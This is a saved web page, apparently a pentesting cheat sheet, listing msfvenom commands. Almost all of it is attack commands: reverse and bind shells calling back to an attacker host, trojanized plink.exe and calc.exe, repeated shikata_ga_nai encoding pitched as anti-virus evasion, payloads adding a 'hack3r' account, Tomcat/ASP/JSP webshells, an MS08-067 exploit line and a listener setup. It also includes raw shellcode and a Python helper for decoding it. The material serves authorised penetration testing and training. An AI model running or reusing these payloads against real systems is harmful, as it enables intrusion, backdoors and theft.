created: 2022-04-19T19:52:39 (UTC +08:00)
tags: []
source: https://pentestwiki.org/msfvenom-payloads-cheat-sheet/
author:

Msfvenom Payloads Cheat Sheet - pentestwiki.org

Excerpt

Extensive list with Metasploit MSFvenom payloads: reverse shells, trojanized exe files, webshells, obfuscated payloads, …


Extensive list of msfvenom payloads cheat sheet for Metasploit

General commands with Msfvenom


General commands with Msfvenom - 图1


List all payload types (around 562):

msfvenom -l payloads

Show only Windows x64 payloads:

msfvenom -l payloads --platform windows --arch x64

Show the available output formats (asp, exe, php, powershell, js_le, csharp, …):

msfvenom --list formats

[Figure 2: General commands with Msfvenom]

Metasploit Msfvenom Basic Usage

Difference between staged and non-staged payloads

In msfvenom we can choose between staged and non-staged payloads, but what are they?

Non-staged payloads are standalone: the whole payload is sent to the target at once. Advantage: fewer network exchanges, which makes it easier to avoid detection.

Staged payloads are sent in two stages: the first stage loads a small stager (dropper), and the second stage loads the actual payload. The advantages are: 1) if the buffer overflow is too small to hold a non-staged payload, splitting it in two helps; 2) having several parts is also better against host anti-virus detection.

In Metasploit payload names the difference shows in the separator: windows/shell_reverse_tcp (underscore) is non-staged, windows/shell/reverse_tcp (slash) is staged.

Payloads generation with Msfvenom

Binary payloads

Generate C code for a Windows target with a TCP reverse shell connecting back to host $LOCALIP:443 (non-staged payload):

msfvenom -p windows/shell_reverse_tcp LHOST=$LOCALIP LPORT=443 -f c

Generate C code for a Windows target with a TCP reverse shell connecting back to host $LOCALIP:443 (staged payload):

msfvenom -p windows/shell/reverse_tcp LHOST=$LOCALIP LPORT=443 -f c

Generate C code for a TCP reverse shell to host $LOCALIP:443, encoding the payload with x86/shikata_ga_nai and avoiding the bad characters \x00\x0a\x0d in the shellcode:

msfvenom -p windows/shell_reverse_tcp LHOST=$LOCALIP LPORT=443 -f c -e x86/shikata_ga_nai -b "\x00\x0a\x0d"

Generate C code for a TCP reverse shell to host $LOCALIP:443, encoding the payload, avoiding the bad characters \x00\x0a\x0d in the shellcode, and using EXITFUNC=thread so that the shellcode terminates only its own thread instead of crashing the host process:

msfvenom -p windows/shell_reverse_tcp LHOST=$LOCALIP LPORT=443 EXITFUNC=thread -f c -e x86/shikata_ga_nai -b "\x00\x0a\x0d"

Generate C code for a bind shell on a Linux target listening on port TCP/4444, avoiding the bad characters \x00\x0a\x0d\x20 and encoding the shellcode:

msfvenom -p linux/x86/shell_bind_tcp LPORT=4444 -f c -b "\x00\x0a\x0d\x20" -e x86/shikata_ga_nai

Generate a JavaScript (little-endian, js_le) payload for a reverse shell against host $LOCALIP on port 443, with no encoder applied (windows/shell_reverse_tcp is the non-staged form):

msfvenom -p windows/shell_reverse_tcp LHOST=$LOCALIP LPORT=443 -f js_le -e generic/none

Generate a Windows EXE whose shellcode runs a reverse shell against host $LOCALIP on port 4444 (TCP). The output is written to the file shell_reverse.exe:

msfvenom -p windows/shell_reverse_tcp LHOST=$LOCALIP LPORT=4444 -f exe -o shell_reverse.exe

Generate a Windows EXE whose shellcode runs a reverse shell against host $LOCALIP on port 4444 (TCP), encoded with 9 iterations of x86/shikata_ga_nai. The output is written to the file shell_reverse_msf_encoded.exe:

msfvenom -p windows/shell_reverse_tcp LHOST=$LOCALIP LPORT=4444 -f exe -e x86/shikata_ga_nai -i 9 -o shell_reverse_msf_encoded.exe

Trojanize plink.exe so that it runs a reverse shell against host $LOCALIP:4444 (TCP), using 9 encoding iterations, and write the resulting EXE to shell_reverse_msf_encoded_embedded.exe:

msfvenom -p windows/shell_reverse_tcp LHOST=$LOCALIP LPORT=4444 -f exe -e x86/shikata_ga_nai -i 9 -x /usr/share/windows-binaries/plink.exe -o shell_reverse_msf_encoded_embedded.exe

Generate an EXE file called met_https_reverse.exe that connects back over HTTPS (port 443) to host $LOCALIP, where a meterpreter handler is listening:

msfvenom -p windows/meterpreter/reverse_https LHOST=$LOCALIP LPORT=443 -f exe -o met_https_reverse.exe


Trojanize plink.exe with a meterpreter reverse HTTP shell connecting back to $LOCALIP on port 80, encoded with x86/shikata_ga_nai, and write it to /var/www/daaa118.exe:

msfvenom -p windows/meterpreter/reverse_http LHOST=$LOCALIP LPORT=80 -f exe -e x86/shikata_ga_nai -x /usr/share/windows-binaries/plink.exe -o /var/www/daaa118.exe

Trojanize calc.exe to run a meterpreter reverse shell against host $LOCALIP while keeping the original program's behaviour (-k injects the payload as a new thread), saved as calc_2.exe:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=$LOCALIP -f exe -k -x calc.exe -o calc_2.exe

Staged ELF shared library (.so) payload with a reverse shell:

msfvenom -p linux/x86/shell/reverse_tcp LHOST=$LOCALIP LPORT=443 -o staged.out -f elf-so

Non-staged ELF shared library (.so) payload with a reverse shell:

msfvenom -p linux/x86/shell_reverse_tcp LHOST=$LOCALIP LPORT=443 -o non-staged.out -f elf-so

Generate the file meterpreter.exe containing a meterpreter reverse shell against host $LOCALIP on port TCP/443:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=$LOCALIP LPORT=443 -f exe -o meterpreter.exe

Warning: when using the -x parameter, the template executable must not be UPX compressed.

Trojanize plink.exe with a meterpreter reverse TCP shell to $LOCALIP:443, encoded with x86/shikata_ga_nai, saved as plink-meterpreter.exe:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=$LOCALIP LPORT=443 -f exe -x /usr/share/windows-binaries/plink.exe -e x86/shikata_ga_nai -o plink-meterpreter.exe

Exploit MS08-067 (NetAPI vulnerability) on host $IP and run a bind shell after exploitation (note that msfcli has since been removed from Metasploit; the same module is run from msfconsole):

msfcli windows/smb/ms08_067_netapi RHOST=$IP PAYLOAD=windows/shell/bind_tcp E

Generate a Python payload that executes calc.exe, omitting the character \x00 (NULL byte):

msfvenom -p windows/exec CMD=calc.exe -b "\x00" -f py

Create the file account.exe, encoded with 20 iterations, containing a payload that creates the user hack3r with password s3cret^s3cret:

msfvenom -p windows/adduser -f exe -o account.exe USER=hack3r PASS=s3cret^s3cret -e x86/shikata_ga_nai -i 20

Trojanized DLL calc.dll that executes calc.exe:

msfvenom -p windows/exec CMD=calc.exe -f dll -o calc.dll

Generate a Windows service executable (exe-service format) that runs calc.exe:

msfvenom -p windows/exec CMD=calc.exe -f exe-service

Generate a Windows service executable, encoded with 20 iterations, that creates a new user hack3r with password s3cret^s3cret:

msfvenom -p windows/adduser -f exe-service -o service.exe USER=hack3r PASS=s3cret^s3cret -e x86/shikata_ga_nai -i 20

Get the shellcode's assembler listing (raw output piped into ndisasm):

msfvenom -p linux/x86/exec cmd=whoami R | ndisasm -u -

Payload size: 42 bytes
00000000  6A0B          push byte +0xb
00000002  58            pop eax
00000003  99            cdq
00000004  52            push edx
00000005  66682D63      push word 0x632d
00000009  89E7          mov edi,esp
0000000B  682F736800    push dword 0x68732f
00000010  682F62696E    push dword 0x6e69622f
00000015  89E3          mov ebx,esp
00000017  52            push edx
00000018  E807000000    call 0x24
0000001D  7768          ja 0x87
0000001F  6F            outsd
00000020  61            popa
00000021  6D            insd
00000022  6900575389E1  imul eax,[eax],dword 0xe1895357
00000028  CD80          int 0x80

Note that the lines from 0000001D to 00000022 are not real instructions: ndisasm is decoding the embedded string "whoami\0" that the call jumps over (the call pushes the string's address as its return address), and the push edi / push ebx / mov ecx,esp at 0x24 get swallowed into the bogus imul. Execution actually resumes at 0x24.

Get the shellcode in a friendly format to embed in a Python/Perl exploit:

msfvenom -p linux/x86/exec cmd=whoami R | hexdump -v -e '"\\x" 1/1 "%02x"'

Payload size: 42 bytes
\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7
\x68\x2f\x73\x68\x00\x68\x2f\x62\x69\x6e\x89
\xe3\x52\xe8\x07\x00\x00\x00\x77\x68\x6f\x61
\x6d\x69\x00\x57\x53\x89\xe1\xcd\x80
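As an added example (not from the page or from Metasploit), the following Python helper works with shellcode in the \x.. form above: it decodes the page's 42-byte linux/x86/exec sample, reports which of the bad characters excluded by the -b examples (\x00\x0a\x0d\x20) are actually present, since this sample was generated without -b, and recovers the embedded CMD string from the call-over-string stub visible in the ndisasm listing, which is useful when triaging a captured payload. All function and variable names are my own.

```python
import re
from typing import Dict, List, Optional

# Constructed from the page's hexdump output for
# `msfvenom -p linux/x86/exec cmd=whoami R` (42 bytes, generated without -b).
SAMPLE_ESCAPED = (
    r"\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7"
    r"\x68\x2f\x73\x68\x00\x68\x2f\x62\x69\x6e\x89"
    r"\xe3\x52\xe8\x07\x00\x00\x00\x77\x68\x6f\x61"
    r"\x6d\x69\x00\x57\x53\x89\xe1\xcd\x80"
)

# Bad-character set used by the Linux bind shell example on this page.
BADCHARS = b"\x00\x0a\x0d\x20"


def unescape_shellcode(text: str) -> bytes:
    """Turn the hexdump-style '\\x6a\\x0b...' text back into raw bytes."""
    return bytes(int(h, 16) for h in re.findall(r"\\x([0-9a-fA-F]{2})", text))


def escape_shellcode(data: bytes) -> str:
    """Inverse: render raw bytes in the '\\x..' form used in Python/Perl exploits."""
    return "".join(f"\\x{b:02x}" for b in data)


def find_bad_chars(data: bytes, bad: bytes = BADCHARS) -> Dict[int, List[int]]:
    """Map every forbidden byte that occurs to the offsets where it appears.
    An empty result is what `msfvenom -b` is supposed to guarantee."""
    return {b: [i for i, x in enumerate(data) if x == b] for b in bad if b in data}


def extract_exec_command(data: bytes) -> Optional[str]:
    """Recover the CMD string from a linux/x86/exec payload.

    The stub does `call <past the string>` (E8 + little-endian rel32) so the
    string's address is pushed; the NUL-terminated command sits right after
    the call, which is what ndisasm mis-decodes as ja/outsd/popa/insd."""
    idx = data.find(b"\xe8")
    if idx < 0 or idx + 5 > len(data):
        return None
    length = int.from_bytes(data[idx + 1:idx + 5], "little")
    blob = data[idx + 5:idx + 5 + length]
    if len(blob) != length or not blob.endswith(b"\x00"):
        return None
    return blob[:-1].decode("ascii", errors="replace")


if __name__ == "__main__":
    sc = unescape_shellcode(SAMPLE_ESCAPED)
    print(len(sc), "bytes; CMD =", extract_exec_command(sc))
    print("bad chars present:", find_bad_chars(sc))
```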

Webshells generation with Msfvenom

Tomcat webshell (WAR) with a meterpreter reverse shell against host $LOCALIP:

msfvenom -p java/meterpreter/reverse_tcp -f war -o tomcatapp.war LHOST=$LOCALIP

Tomcat webshell (WAR) with a standalone reverse shell against host $LOCALIP on port 442:

msfvenom -p java/shell_reverse_tcp -f war -o tomcatapp2.war LHOST=$LOCALIP LPORT=442

ASP webshell on Windows:

msfvenom -p windows/shell_reverse_tcp LHOST=$LOCALIP LPORT=443 -f asp -o webshell_reverse_msfvenom.txt

JSP webshell on Linux:

msfvenom -p linux/x86/shell/reverse_tcp LHOST=$LOCALIP LPORT=443 -o test.jsp -f jsp

-v <name>: sets the variable name used in the generated output (for example the C array or Python variable holding the shellcode), which is very useful when swapping a new payload into an existing exploit.

Start a Metasploit handler to receive the reverse connection from the payloads above:

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LPORT 443
set LHOST $LOCALIP
exploit
